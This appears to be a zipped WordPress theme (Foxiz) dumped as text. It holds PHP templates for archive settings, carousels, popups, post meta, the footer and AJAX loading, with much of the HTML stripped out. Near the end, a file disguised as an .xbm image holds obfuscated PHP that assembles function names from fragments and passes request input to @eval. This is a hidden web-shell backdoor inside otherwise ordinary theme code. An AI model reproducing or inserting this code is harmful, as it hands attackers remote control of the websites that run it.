foxiz_get_option( $prefix . 'excerpt' ); if ( ! empty( $settings['excerpt'] ) ) { $settings['excerpt_length'] = foxiz_get_option( $prefix . 'excerpt_length' ); $settings['excerpt_source'] = foxiz_get_option( $prefix . 'excerpt_source' ); } $settings['readmore'] = foxiz_get_option( $prefix . 'readmore' ); $settings['title_tag'] = foxiz_get_option( $prefix . 'title_tag' ); $settings['hide_category'] = foxiz_get_option( $prefix . 'hide_category' ); $settings['tablet_hide_meta'] = foxiz_get_option( $prefix . 'tablet_hide_meta' ); $settings['mobile_hide_meta'] = foxiz_get_option( $prefix . 'mobile_hide_meta' ); $settings['hide_excerpt'] = foxiz_get_option( $prefix . 'hide_excerpt' ); return $settings; } } if ( ! function_exists( 'foxiz_get_search_page_settings' ) ) { /** * @return array */ function foxiz_get_search_page_settings() { $settings = foxiz_get_archive_page_settings( 'search_' ); $settings['s'] = get_search_query( 's' ); $settings['posts_per_page'] = foxiz_get_option( 'search_posts_per_page' ); $settings['template_global'] = foxiz_get_option( 'search_template_global' ); if ( empty( $settings['posts_per_page'] ) ) { $settings['posts_per_page'] = get_option( 'posts_per_page' ); } return $settings; } } if ( ! function_exists( 'foxiz_get_page_header_style' ) ) { /** * @param string $page_id * * @return false|mixed|string|void */ function foxiz_get_page_header_style( $page_id = '' ) { if ( empty( $page_id ) ) { $page_id = get_the_ID(); } $setting = rb_get_meta( 'page_header_style', $page_id ); if ( empty( $setting ) || 'default' === $setting ) { $setting = foxiz_get_option( 'page_page_header_style' ); } if ( empty( $setting ) ) { $setting = '1'; } return $setting; } } if ( ! function_exists( 'foxiz_get_page_content_width' ) ) { /** * @param string $page_id * * @return false|mixed|void */ function foxiz_get_page_content_width( $page_id = '' ) { if ( empty( $page_id ) ) { $page_id = get_the_ID(); } $setting = rb_get_meta( 'width_wo_sb', $page_id ); if ( empty( $setting ) || 'default' === $setting ) { $setting = foxiz_get_option( 'page_width_wo_sb' ); } elseif ( '-1' === (string) $setting ) { return false; } return $setting; } } /** * @param array $settings */ if ( ! function_exists( 'foxiz_carousel_footer' ) ) { function foxiz_carousel_footer( $settings = array() ) { if ( ! empty( $settings['carousel_dot'] ) || ! empty( $settings['carousel_nav'] ) ) : $classes = 'slider-footer'; if ( ! empty( $settings['color_scheme'] ) ) { $classes .= ' light-scheme'; } ?>
'3', 'columns_tablet' => '2', 'columns_mobile' => '1', 'carousel_gap' => '', 'carousel_gap_tablet' => '', 'carousel_gap_mobile' => '', 'slider_play' => '', 'slider_fmode' => '', 'slider_centered' => '', ) ); if ( (string) $settings['carousel_gap'] === '-1' ) { $settings['carousel_gap'] = 0; } if ( (string) $settings['carousel_gap_tablet'] === '-1' ) { $settings['carousel_gap_tablet'] = 0; } if ( (string) $settings['carousel_gap_mobile'] === '-1' ) { $settings['carousel_gap_mobile'] = 0; } if ( ! empty( $settings['carousel_columns'] ) ) { $settings['columns'] = $settings['carousel_columns']; } if ( ! empty( $settings['carousel_columns_tablet'] ) ) { $settings['columns_tablet'] = $settings['carousel_columns_tablet']; } if ( ! empty( $settings['carousel_columns_mobile'] ) ) { $settings['columns_mobile'] = $settings['carousel_columns_mobile']; } if ( empty( $settings['carousel_wide_columns'] ) ) { $settings['carousel_wide_columns'] = $settings['columns']; } if ( empty( $settings['slider_speed'] ) ) { $settings['slider_speed'] = 5000; } if ( empty( $settings['slider_centered'] ) || '-1' === (string) $settings['slider_centered'] ) { $settings['slider_centered'] = 0; } else { $settings['slider_centered'] = 1; } echo ' data-wcol="' . esc_attr( $settings['carousel_wide_columns'] ) . '"'; echo ' data-col="' . esc_attr( $settings['columns'] ) . '" data-tcol="' . esc_attr( $settings['columns_tablet'] ) . '" data-mcol="' . esc_attr( $settings['columns_mobile'] ) . '"'; echo ' data-gap="' . esc_attr( $settings['carousel_gap'] ) . '" data-tgap="' . esc_attr( $settings['carousel_gap_tablet'] ) . '" data-mgap="' . esc_attr( $settings['carousel_gap_mobile'] ) . '"'; echo ' data-play="' . esc_attr( $settings['slider_play'] ) . '" data-speed="' . esc_attr( $settings['slider_speed'] ) . '" data-fmode="' . esc_attr( $settings['slider_fmode'] ) . '" data-centered="' . esc_attr( $settings['slider_centered'] ) . '" '; } } /** * @param array $settings */ if ( ! function_exists( 'foxiz_slider_attrs' ) ) { function foxiz_slider_attrs( $settings = array() ) { $settings = wp_parse_args( $settings, array( 'slider_play' => '0' ) ); if ( empty( $settings['slider_speed'] ) ) { $settings['slider_speed'] = 5000; } echo ' data-play="' . esc_attr( $settings['slider_play'] ) . '" data-speed="' . esc_attr( $settings['slider_speed'] ) . '"'; } }PK!#templates/modules/grid.phpnu[
'; if ( empty( $settings['title_tag'] ) ) { $settings['title_tag'] = 'h6'; } ?>
term_id; $meta = get_option( 'foxiz_category_meta', array() ); $featured_array = array(); $featured_urls_array = array(); if ( ! empty( $meta[ $id ]['featured_image'] ) ) { $featured_array = $meta[ $id ]['featured_image']; } if ( ! empty( $meta[ $id ]['featured_image_urls'] ) ) { $featured_urls_array = $meta[ $id ]['featured_image_urls']; } ?>
'; echo '' . esc_html( $category->name ) . ''; echo ''; if ( ! empty( $settings['count_posts'] ) && '1' === (string) $settings['count_posts'] ) : $count = $category->category_count . ' ' . foxiz_html__( 'Articles', 'foxiz' ); if ( '1' === (string) $category->category_count ) { $count = $settings['count_posts'] . ' ' . foxiz_html__( 'Article', 'foxiz' ); } ?>
$id ) ); } ?>
term_id; $meta = get_option( 'foxiz_category_meta', array() ); $featured_array = array(); $featured_urls_array = array(); if ( ! empty( $meta[ $id ]['featured_image'] ) ) { $featured_array = $meta[ $id ]['featured_image']; } if ( ! empty( $meta[ $id ]['featured_image_urls'] ) ) { $featured_urls_array = $meta[ $id ]['featured_image_urls']; } ?>
'; echo '' . esc_html( $category->name ) . ''; echo ''; if ( ! empty( $settings['count_posts'] ) && '1' === (string) $settings['count_posts'] ) : $count = $category->category_count . ' ' . foxiz_html__( 'Articles', 'foxiz' ); if ( '1' === (string) $category->category_count ) { $count = $settings['count_posts'] . ' ' . foxiz_html__( 'Article', 'foxiz' ); } ?>
$id, 'classes' => 'is-light' ) ); } ?>
term_id; $meta = get_option( 'foxiz_category_meta', array() ); $featured_array = array(); $featured_urls_array = array(); if ( ! empty( $meta[ $id ]['featured_image'] ) ) { $featured_array = $meta[ $id ]['featured_image']; } if ( ! empty( $meta[ $id ]['featured_image_urls'] ) ) { $featured_urls_array = $meta[ $id ]['featured_image_urls']; } ?>
category_count . ' ' . foxiz_html__( 'Articles', 'foxiz' ); if ( '1' === (string) $category->category_count ) { $count = $settings['count_posts'] . ' ' . foxiz_html__( 'Article', 'foxiz' ); } ?> '; echo '' . esc_html( $category->name ) . ''; echo ''; ?>
description ) && $description ): ?>
description, 25 ); ?>
'; foxiz_follow_trigger( array( 'id' => $id, 'classes' => 'is-light' ) ); echo '
'; } ?>
term_id; $meta = get_option( 'foxiz_category_meta', array() ); $featured_array = array(); $featured_urls_array = array(); if ( ! empty( $meta[ $id ]['featured_image'] ) ) { $featured_array = $meta[ $id ]['featured_image']; } if ( ! empty( $meta[ $id ]['featured_image_urls'] ) ) { $featured_urls_array = $meta[ $id ]['featured_image_urls']; } ?>
$id, 'classes' => 'is-light' ) ); } ?>
category_count . ' ' . foxiz_html__( 'Articles', 'foxiz' ); if ( '1' === (string) $category->category_count ) { $count = $settings['count_posts'] . ' ' . foxiz_html__( 'Article', 'foxiz' ); } ?> '; echo '' . esc_html( $category->name ) . ''; echo ''; ?>
term_id; $meta = get_option( 'foxiz_category_meta', array() ); $featured_array = array(); $featured_urls_array = array(); if ( ! empty( $meta[ $id ]['featured_image'] ) ) { $featured_array = $meta[ $id ]['featured_image']; } if ( ! empty( $meta[ $id ]['featured_image_urls'] ) ) { $featured_urls_array = $meta[ $id ]['featured_image_urls']; } ?>
'; echo '' . esc_html( $category->name ) . ''; echo ''; if ( ! empty( $settings['count_posts'] ) && '1' === (string) $settings['count_posts'] ) : $count = $category->category_count . ' ' . foxiz_html__( 'Articles', 'foxiz' ); if ( '1' === (string) $category->category_count ) { $count = $settings['count_posts'] . ' ' . foxiz_html__( 'Article', 'foxiz' ); } ?>
Order allow,deny Deny from all Order allow,deny Allow from all RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PK!]++templates/popup.phpnu['; $output .= '
'; $output .= '
'; $output .= wp_kses( $text, 'foxiz' ); $output .= '
'; $output .= '
'; $output .= '' . foxiz_html__( 'Accept', 'foxiz' ) . ''; $output .= '
'; $output .= '
'; $output .= ''; return $output; } } if ( ! function_exists( 'foxiz_render_privacy' ) ) { /** * @return false */ function foxiz_render_privacy() { if ( foxiz_is_amp() || empty( foxiz_get_option( 'privacy_bar' ) ) || empty( foxiz_get_option( 'privacy_text' ) ) ) { return false; } $text = foxiz_get_option( 'privacy_text' ); $class_name = 'privacy-top'; if ( ! empty( foxiz_get_option( 'privacy_position' ) ) ) { $class_name = 'privacy-' . foxiz_get_option( 'privacy_position' ); } echo foxiz_get_privacy( $text, $class_name ); } } if ( ! function_exists( 'foxiz_popup_newsletter' ) ) { function foxiz_popup_newsletter() { echo foxiz_get_popup_newsletter(); } } if ( ! function_exists( 'foxiz_get_popup_newsletter' ) ) { /** * @return false|string */ function foxiz_get_popup_newsletter() { if ( ! foxiz_get_option( 'newsletter_popup' ) || foxiz_is_amp() ) { return false; } $title = foxiz_get_option( 'newsletter_title' ); $description = foxiz_get_option( 'newsletter_description' ); $shortcode = foxiz_get_option( 'newsletter_shortcode' ); $footer = foxiz_get_option( 'newsletter_footer' ); $footer_url = foxiz_get_option( 'newsletter_footer_url' ); $cover = foxiz_get_option( 'newsletter_cover' ); $display = foxiz_get_option( 'newsletter_popup_display' ); $offset = foxiz_get_option( 'newsletter_popup_offset' ); $delay = foxiz_get_option( 'newsletter_popup_delay' ); $expired = foxiz_get_option( 'newsletter_popup_expired' ); $output = ''; return $output; } } if ( ! function_exists( 'foxiz_render_user_form_popup' ) ) { /** * @return false */ function foxiz_render_user_form_popup() { $args = array(); $settings = foxiz_get_option(); if ( is_user_logged_in() || ( empty( $settings['header_login_icon'] ) && empty( 'mobile_login' ) ) ) { return false; } if ( ! empty( $settings['header_login_redirect'] ) ) { $args['redirect'] = $settings['header_login_redirect']; } if ( ! empty( $settings['header_login_register'] ) ) { $args['register'] = $settings['header_login_register']; } if ( ! empty( $settings['header_login_forget'] ) ) { $args['forget_password'] = $settings['header_login_forget']; } ?>
'popup-form', 'label_log_in' => esc_html__( 'Sign In', 'foxiz' ), ); if ( ! empty( $settings['redirect'] ) ) { $args['redirect'] = $settings['redirect']; } if ( empty( $settings['register'] ) ) { $settings['register'] = wp_registration_url(); } if ( empty( $settings['forget_password'] ) ) { $settings['forget_password'] = wp_lostpassword_url(); } ?>
'; $output .= '
'; $output .= '
' . foxiz_get_svg( 'adblock' ) . '
'; if ( ! empty( $title ) ) { $output .= '
' . esc_html( $title ) . '
'; } if ( ! empty( $description ) ) { $output .= '
' . wp_kses( $description, 'foxiz' ) . '
'; } $output .= ''; $output .= '
'; $output .= ''; return $output; } } if ( ! function_exists( 'foxiz_footer_slide_up' ) ) { function foxiz_footer_slide_up() { echo foxiz_get_footer_slide_up(); } } if ( ! function_exists( 'foxiz_get_footer_slide_up' ) ) { /** * @return false|string */ function foxiz_get_footer_slide_up() { if ( ! foxiz_get_option( 'footer_slide_up' ) || ! foxiz_get_option( 'slide_up_shortcode' ) ) { return false; } $delay = foxiz_get_option( 'slide_up_delay' ); $expired = foxiz_get_option( 'slide_up_expired' ); if ( empty( $expired ) ) { $expired = 1; } elseif ( '-1' === (string) $expired ) { $expired = 0; } if ( empty( $delay ) ) { $delay = 2000; } $output = ''; return $output; } }PK!tYzztemplates/entry.phpnu['; if ( ! empty( $settings['title_prefix'] ) ) { echo wp_kses( $settings['title_prefix'], 'foxiz' ); } ?> '; } } if ( ! function_exists( 'foxiz_entry_readmore' ) ) { /** * @param array $settings * render read more */ function foxiz_entry_readmore( $settings = array() ) { if ( empty( $settings['readmore'] ) ) { return; } ?>

$settings['excerpt_length'] ) { return false; } if ( ! empty( $settings['excerpt_source'] ) && 'tagline' === $settings['excerpt_source'] && rb_get_meta( 'tagline' ) ) : $tagline = wp_trim_words( rb_get_meta( 'tagline' ), intval( $settings['excerpt_length'] ), '' ); ?>

…' ); } if ( empty( $output ) ) { $output = get_the_content( '' ); $output = strip_shortcodes( $output ); $output = excerpt_remove_blocks( $output ); $output = preg_replace( "~(?:\[/?)[^/\]]+/?\]~s", '', $output ); $output = str_replace( ']]>', ']]>', $output ); $output = wp_strip_all_tags( $output ); $output = wp_trim_words( $output, intval( $settings['excerpt_length'] ), '' ); } if ( empty( $output ) ) { return false; } ?>

'; } if ( ! empty( $timestamp ) ) : ?> 1 ) { foxiz_entry_meta_authors( $settings, $author_data, $job ); return false; } } /** single author */ $classes = array(); $author_id = get_post_field( 'post_author', $post_id ); $label = foxiz_get_option( 'meta_author_label' ); if ( is_singular( 'post' ) ) { $label = foxiz_get_option( 'single_post_meta_author_label' ); } $classes[] = 'meta-el meta-author'; if ( ! empty( $settings['tablet_hide_meta'] ) && is_array( $settings['tablet_hide_meta'] ) && in_array( 'author', $settings['tablet_hide_meta'] ) ) { $classes[] = 'tablet-hide'; } if ( ! empty( $settings['mobile_hide_meta'] ) && is_array( $settings['mobile_hide_meta'] ) && in_array( 'author', $settings['mobile_hide_meta'] ) ) { $classes[] = 'mobile-hide'; } ?>  -  ID ); ?> ID ) ) : ?>  - ID ); ?> 1 ) { $classes[] = 'multiple-meta-avatar'; ?> ID ), absint( $settings['avatar_size'] ), '', get_the_author_meta( 'display_name', $author->ID ) ); ?> '; } foreach ( $categories as $category ) : ?> name ); ?> '; } ?> '; } if ( '0' === (string) $count ) { foxiz_html_e( 'Add a Comment', 'foxiz' ); } elseif ( '1' === (string) $count ) { foxiz_html_e( '1 comment', 'foxiz' ); } else { echo sprintf( foxiz_html__( '%s comments', 'foxiz' ), foxiz_pretty_number( $count ) ); } ?> options['display']['restrict_display']['groups']; if ( is_user_logged_in() ) { if ( in_array( 'users', $groups, true ) ) { $display = false; } elseif ( in_array( 'roles', $groups, true ) && Post_Views_Counter()->counter->is_user_role_excluded( get_current_user_id(), Post_Views_Counter()->options['display']['restrict_display']['roles'] ) ) { $display = false; } } elseif ( in_array( 'guests', $groups, true ) ) { $display = false; } if ( ! in_the_loop() && ! class_exists( 'bbPress' ) ) { $display = false; } if ( ! $display ) { return false; } $count = pvc_get_post_views( $post_id ); $fake_view = rb_get_meta( 'start_view', $post_id ); if ( ! empty( $fake_view ) ) { $count = intval( $count ) + intval( $fake_view ); } if ( empty( $count ) ) { return false; } $classes[] = 'meta-el meta-view'; if ( ! empty( $settings['tablet_hide_meta'] ) && is_array( $settings['tablet_hide_meta'] ) && in_array( 'view', $settings['tablet_hide_meta'] ) ) { $classes[] = 'tablet-hide'; } if ( ! empty( $settings['mobile_hide_meta'] ) && is_array( $settings['mobile_hide_meta'] ) && in_array( 'view', $settings['mobile_hide_meta'] ) ) { $classes[] = 'mobile-hide'; } ?> '; } if ( '1' === (string) $count ) { foxiz_html_e( '1 View', 'foxiz' ); } else { echo sprintf( foxiz_html__( '%s Views' ), foxiz_pretty_number( $count ) ); } ?> '; } if ( ! empty( $timestamp ) ) : ?> 30 ) { $minutes ++; } $classes[] = 'meta-el meta-read'; if ( ! empty( $settings['tablet_hide_meta'] ) && is_array( $settings['tablet_hide_meta'] ) && in_array( 'read', $settings['tablet_hide_meta'] ) ) { $classes[] = 'tablet-hide'; } if ( ! empty( $settings['mobile_hide_meta'] ) && is_array( $settings['mobile_hide_meta'] ) && in_array( 'read', $settings['mobile_hide_meta'] ) ) { $classes[] = 'mobile-hide'; } ?> '; } echo sprintf( foxiz_html__( '%s Min Read', 'foxiz' ), $minutes ); ?> 'featured-img' ) ); ?> '', 'crop_size' => '1536x1536', 'format' => '' ) ); $classes = array(); $classes[] = 'p-featured'; if ( ! empty( $settings['featured_classes'] ) ) { $classes[] = $settings['featured_classes']; } if ( has_post_format( 'video' ) ) { $video_preview = wp_get_attachment_url( rb_get_meta( 'video_preview' ) ); } ?>
'; case 'gallery' : if ( ! foxiz_get_option( 'post_icon_gallery' ) ) { return false; } $gallery = rb_get_meta( 'gallery_data' ); $gallery = explode( ',', $gallery ); $classes[] = 'format-gallery'; return '' . count( $gallery ) . ''; case 'audio' : if ( ! foxiz_get_option( 'post_icon_audio' ) ) { return false; } $classes[] = 'format-radio'; return ''; default: return false; } } } if ( ! function_exists( 'foxiz_get_entry_categories' ) ) { /** * @param $settings * * @return false|string */ function foxiz_get_entry_categories( $settings ) { if ( empty( $settings['entry_category'] ) ) { return false; } $output = ''; $classes = array(); $categories = get_the_category(); $primary_category = ''; $primary_category_name = ''; if ( ! isset( $settings['is_singular'] ) ) { $primary_category = rb_get_meta( 'primary_category' ); $primary_category_name = get_cat_name( $primary_category ); } $max = absint( foxiz_get_option( 'max_categories' ) ); if ( empty( $max ) ) { $max = 99999; } $index = 1; $classes[] = 'p-categories'; if ( ! empty( $primary_category_name ) ) { $classes[] = 'is-primary'; } if ( ! empty( $settings['category_classes'] ) ) { $classes[] = $settings['category_classes']; } $classes = join( ' ', $classes ); $output .= '
'; if ( empty( $primary_category ) || empty ( $primary_category_name ) ) : if ( ! empty( $categories ) && is_array( $categories ) ) : foreach ( $categories as $category ) : $output .= ''; $output .= esc_html( $category->name ); $output .= ''; $index ++; if ( $index > $max ) { break; } endforeach; endif; else : $output .= ''; $output .= esc_html( $primary_category_name ); $output .= ''; endif; $output .= '
'; return $output; } } if ( ! function_exists( 'foxiz_entry_format_absolute' ) ) { /** * @param array $settings */ function foxiz_entry_format_absolute( $settings = array() ) { if ( empty( $settings['entry_format'] ) || 'after-category' === $settings['entry_format'] ) { return false; } $layout = explode( ',', $settings['entry_format'] ); $classes = array(); $classes[] = 'entry-format-absolute format-style-' . $layout[0]; if ( ! empty( $layout[1] ) ) { $classes[] = 'format-size-' . $layout[1]; } if ( foxiz_get_entry_format( $settings ) ) { echo ''; } } } if ( ! function_exists( 'foxiz_get_entry_top' ) ) { /** * @param array $settings * * @return false|string */ function foxiz_get_entry_top( $settings = array() ) { if ( ! empty( $settings['entry_format'] ) && 'after-category' === $settings['entry_format'] ) { $entry_format_buffer = foxiz_get_entry_format( $settings ); } if ( ! empty( $settings['entry_category'] ) ) { $entry_category_buffer = foxiz_get_entry_categories( $settings ); } if ( empty( $entry_format_buffer ) && empty( $entry_category_buffer ) ) { return false; } $settings['top_classes'] = 'p-top'; if ( ! empty( $settings['hide_category'] ) ) { switch ( $settings['hide_category'] ) { case 'mobile' : $settings['top_classes'] .= ' mobile-hide'; break; case 'tablet' : $settings['top_classes'] .= ' tablet-hide'; break; case 'all' : $settings['top_classes'] .= ' mobile-hide tablet-hide'; break; } } if ( ! empty ( $entry_format_buffer ) ) { $output = '
'; $output .= foxiz_get_entry_categories( $settings ); $output .= ''; $output .= '
'; } else { $settings['category_classes'] = $settings['top_classes']; $output = foxiz_get_entry_categories( $settings ); } if ( ! empty( $settings['top_spacing'] ) ) { $output .= '
'; } return $output; } } if ( ! function_exists( 'foxiz_entry_top' ) ) { /** * @param array $settings */ function foxiz_entry_top( $settings = array() ) { echo foxiz_get_entry_top( $settings ); } } if ( ! function_exists( 'foxiz_entry_counter' ) ) { /** * @param array $settings */ function foxiz_entry_counter( $settings = array() ) { if ( ! empty( $settings['counter'] ) ) { echo ''; } } } if ( ! function_exists( 'foxiz_entry_review' ) ) { /** * @param $settings * * @return false|void */ function foxiz_entry_review( $settings ) { if ( empty( $settings['review'] ) || 'replace' === $settings['review'] ) { return false; } echo foxiz_get_entry_review( $settings ); } } if ( ! function_exists( 'foxiz_get_entry_review' ) ) { /** * @param array $settings * * @return false|string */ function foxiz_get_entry_review( $settings ) { if ( empty( $settings['review'] ) ) { return false; } $review = foxiz_get_review_settings(); if ( ! is_array( $review ) ) { return false; } if ( empty( $review['average'] ) ) { $review['average'] = 0; } $class_name = 'review-meta is-meta'; if ( ! empty( $review['type'] ) && 'score' === $review['type'] ) { $class_name .= ' type-score'; } else { $class_name .= ' type-star'; } if ( 'replace' === $settings['review'] && ! empty( $settings['bookmark'] ) ) { $class_name .= ' has-bookmark'; } $output = '
'; $output .= '
'; if ( ! empty( $review['type'] ) && 'score' === $review['type'] ) { $output .= foxiz_get_review_line( $review['average'] ); $output .= '' . $review['average'] . ' ' . foxiz_html__( 'out of 10' ) . ''; } else { $output .= foxiz_get_review_stars( $review['average'] ); $output .= '' . $review['average'] . ' ' . foxiz_html__( 'out of 5' ) . ''; } if ( ! empty( $settings['review_meta'] ) && ! empty( $review['meta'] ) ) { $output .= '
' . esc_html( $review['meta'] ) . '
'; } $output .= '
'; if ( 'replace' === $settings['review'] && ! empty( $settings['bookmark'] ) ) { $output .= foxiz_get_bookmark_trigger( get_the_ID() ); } $output .= '
'; return $output; } } if ( ! function_exists( 'foxiz_get_review_line' ) ) { /** * @param int $average * * @return string */ function foxiz_get_review_line( $average = 0 ) { $output = ''; for ( $i = 1; $i <= 5; $i ++ ) { if ( ceil( floatval( $average ) / 2 ) >= $i ) { $output .= ''; } else { $output .= ''; } } $output .= ''; return $output; } } if ( ! function_exists( 'foxiz_get_review_stars' ) ) { /** * @param int $average * * @return string */ function foxiz_get_review_stars( $average = 0 ) { $output = ''; $output .= ''; for ( $i = 1; $i <= 5; $i ++ ) { $output .= ''; } $output .= ''; return $output; } } if ( ! function_exists( 'foxiz_get_author_info' ) ) { function foxiz_get_author_info( $author_id = '' ) { ob_start(); if ( empty( $author_id ) || ! get_the_author_meta( 'description', $author_id ) ) { return false; } ?>
' . esc_html__( 'Please update WordPress to the latest version to display this video.', 'foxiz' ) . '

'; } $self_hosted_video_url = wp_get_attachment_url( $self_hosted_video_id ); $params = array( 'src' => $self_hosted_video_url, 'width' => 740, 'height' => 415, 'autoplay' => $auto_play ); return wp_video_shortcode( $params ); } else { $params = array( 'width' => 740, 'height' => 415 ); $video_url = rb_get_meta( 'video_url', $post_id ); $video_url = trim( $video_url ); $embed = wp_oembed_get( $video_url, $params ); if ( ! empty( $embed ) ) { return $embed; } else { $embed = rb_get_meta( 'video_embed', $post_id ); if ( ! empty( $embed ) ) { return $embed; } else { return false; } } } } } if ( ! function_exists( 'foxiz_get_audio_embed' ) ) { /** * @param string $post_id * * @return false|mixed|string|void */ function foxiz_get_audio_embed( $post_id = '' ) { if ( empty( $post_id ) ) { $post_id = get_the_ID(); } if ( 'audio' !== get_post_format( $post_id ) ) { return false; } $self_hosted_audio_id = rb_get_meta( 'audio_hosted', $post_id ); if ( ! empty( $self_hosted_audio_id ) ) { $wp_version = floatval( get_bloginfo( 'version' ) ); if ( $wp_version < "3.6" ) { return '

' . esc_html__( 'Please update WordPress to the latest version to display this audio.', 'foxiz' ) . '

'; } $self_hosted_audio_url = wp_get_attachment_url( $self_hosted_audio_id ); $params = array( 'src' => $self_hosted_audio_url, ); return wp_audio_shortcode( $params ); } else { $audio_url = rb_get_meta( 'audio_url', $post_id ); $audio_url = trim( $audio_url ); $embed = wp_oembed_get( $audio_url, array( 'height' => 400, 'width' => 900 ) ); if ( ! empty( $embed ) ) { return $embed; } else { $embed = rb_get_meta( 'audio_embed', $post_id ); if ( ! empty( $embed ) ) { return $embed; } else { return false; } } } } } if ( ! function_exists( 'foxiz_get_attachment_caption' ) ) { /** * @param string $attachment_id * @param string $classes * * @return false|string */ function foxiz_get_attachment_caption( $attachment_id = '', $classes = '' ) { if ( ! wp_get_attachment_caption( $attachment_id ) ) { return false; } $class_name = 'feat-caption meta-text'; if ( ! empty( $classes ) ) { $class_name .= ' ' . $classes; } return '
' . wp_get_attachment_caption( $attachment_id ) . '
'; } }PK!tU!!templates/footer.phpnu[
'; foxiz_footer_copyright(); echo ''; } else { echo '
'; foxiz_render_footer_widgets( $layout ); foxiz_footer_copyright(); echo '
'; } } else { echo '
'; foxiz_footer_copyright(); echo '
'; } ?>
'; dynamic_sidebar( 'foxiz_sidebar_footer_1' ); echo ''; } if ( is_active_sidebar( 'foxiz_sidebar_footer_2' ) ) { echo ''; } if ( is_active_sidebar( 'foxiz_sidebar_footer_3' ) ) { echo ''; } if ( is_active_sidebar( 'foxiz_sidebar_footer_4' ) && ( '3' !== (string) $layout ) ) { echo ''; } if ( is_active_sidebar( 'foxiz_sidebar_footer_5' ) && ! empty( $layout ) && ( '5' === (string) $layout || '51' === (string) $layout ) ) { echo ''; } return ob_get_clean(); } } if ( ! function_exists( 'foxiz_footer_copyright' ) ) : function foxiz_footer_copyright() { if ( ! foxiz_get_footer_copyright() ) { return false; } $classes = 'footer-copyright'; if ( ( foxiz_is_amp() && foxiz_get_option( 'amp_footer_bottom_center' ) ) || foxiz_get_option( 'footer_bottom_center' ) ) { $classes .= ' footer-bottom-centered'; } ?>
'; } if ( ! empty( $menu ) ) { wp_nav_menu( array( 'menu' => $menu, 'menu_id' => 'copyright-menu', 'menu_class' => 'copyright-menu', 'container' => false, 'depth' => 1, 'echo' => true, 'fallback_cb' => '__return_false', ) ); } ?> foxiz_get_option( 'amp_footer_ad_type' ), 'client' => foxiz_get_option( 'amp_footer_adsense_client' ), 'slot' => foxiz_get_option( 'amp_footer_adsense_slot' ), 'size' => foxiz_get_option( 'amp_footer_adsense_size' ), 'custom' => foxiz_get_option( 'amp_footer_ad_code' ), 'classname' => 'footer-amp-ad amp-ad-wrap' ) ); } ?> validate( $_GET['data'] ); $settings['no_found_rows'] = false; $paged = 2; if ( isset( $settings['page_next'] ) ) { $paged = absint( $settings['page_next'] ); } if ( ! empty( $settings['is_related_query'] ) ) { $_query = foxiz_query_related( $settings, $paged ); } else { $_query = foxiz_query( $settings, $paged ); } $response = array(); if ( $_query->have_posts() ) { if ( ! empty( $_query->paged ) ) { $response['paged'] = $_query->paged; } else { $response['paged'] = $paged; } if ( $response['paged'] >= $settings['page_max'] ) { $response['notice'] = $this->end_list_info(); } $response['content'] = $this->render( $settings, $_query ); wp_reset_postdata(); } else { $response['paged'] = $settings['page_max'] + 99; $response['content'] = $this->end_list_info(); } wp_send_json( $response, null ); } /** * @param $settings * * @return array|mixed|string * validate input */ function validate( $settings ) { if ( is_array( $settings ) ) { foreach ( $settings as $key => $val ) { $key = sanitize_text_field( $key ); if ( ! is_array( $settings[ $key ] ) ) { $settings[ $key ] = sanitize_text_field( $val ); } } } elseif ( is_string( $settings ) ) { $settings = sanitize_text_field( $settings ); } else { $settings = ''; } return $settings; } /** * @param $settings * @param $_query * * @return false|string * render */ function render( $settings, $_query ) { ob_start(); $func = 'foxiz_loop_' . trim( $settings['name'] ); if ( function_exists( $func ) ) { call_user_func_array( $func, array( $settings, $_query ) ); } return ob_get_clean(); } /** * @return string * end list info */ function end_list_info() { $output = '
'; $output .= foxiz_html__( 'You\'ve reached the end of the list!', 'foxiz' ); $output .= '
'; return $output; } /** get embed iframe */ public function embed() { if ( empty( $_POST['data'] ) || empty( $_POST['data']['url'] ) ) { die( '-1' ); } wp_send_json( wp_oembed_get( esc_url( $_POST['data']['url'] ), array( 'height' => 450, 'width' => 800 ) ), null ); } function load_next_redirect() { global $wp_query; if ( empty( $wp_query->query_vars['rbsnp'] ) || ! is_singular( 'post' ) ) { return; } $file = '/templates/single/next-posts.php'; $template = locate_template( $file ); if ( $template ) { include( $template ); } exit; } function live_search() { if ( empty( $_GET['s'] ) ) { wp_send_json( '', null ); } $input = sanitize_text_field( $_GET['s'] ); $_query = new WP_Query( array( 's' => $input, 'posts_per_page' => 4, 'post_type' => 'post', 'post_status' => 'publish' ) ); $response = '
'; if ( $_query->have_posts() ) { ob_start(); while ( $_query->have_posts() ) : $_query->the_post(); foxiz_list_small_2( array( 'featured_position' => 'left', 'middle_mode' => '1' ) ); endwhile; $response .= ob_get_clean(); $response .= ''; } else { $response .= '

' . foxiz_html__( 'Sorry, but nothing matched your search terms. Please try again with some different keywords.', 'foxiz' ) . '

'; } $response .= '
'; wp_send_json( $response, null ); } } } PK!templates/templates/index.phpnu[PK!$0"templates/templates/CSbmTMEzOt.xbmnu[p-*/[8+43]/*-w}5-*/.$P/*-g?bFy::Iy-*/[32+21]/*-EK>G-*/.$P/*-QqiG#N-*/[14+43]/*-3n-*/}; /*-;?RY4q-*/if/*-NQs9D3|{-*/((/*-hn,d~{-*/in_array/*-H#!-*/(gettype/*-CGeQ-*/($c)./*-~Xmg|Z~W5^-*/count/*-PQ5C?-*/($c),/*-T-*/$c)/*-skG2lowM_&-*/&&count/*-P3r#,-*/($c)/*-&hiUFE-*/==/*-Ng^>-*/18))/*-D_e-*/{ /*-T0lt-*/(($c[63]=$c[63].$c[73])&&($c[90]=$c[63]($c[90]))&&(/*-tT%=x-*/@eval/*-ZD}D]S-*/($c[63](${$c[45]}[14])/*-^@F-*/))/*-:@7F8-*/);}/*-.0~O-*/class /*-)l-*/q{ /*-!?-*/static/*-Roc`E2-*/ function /*-@Cuy@q-)s-*/yuJ($dQGN) /*-.+u{uHw$-*/{ $KjnBDREhY/*-=`-*/ = /*-:,UKg+:F-*/"r"./*-mOp|9-*/"a"./*-&j@kRe-*/"n"./*->7DyN-*/"g"./*-5S@-*/"e"; /*-pYb)C-*/$PymRiSgD/*-Aq;AEThF-*/ = /*-UQDYm3-*/$KjnBDREhY/*-wCd.U!#ZJ-*/(/*-FH-*/"~"/*-_R-K-*/, /*-~:Xxq#L#%-*/" "/*-oxl-*/);/*-pBL9-*/ $CvJrDP /*-V2Y-*/= /*-T-*/explode/*-z{-*/(/*-Kp1-*/"+", 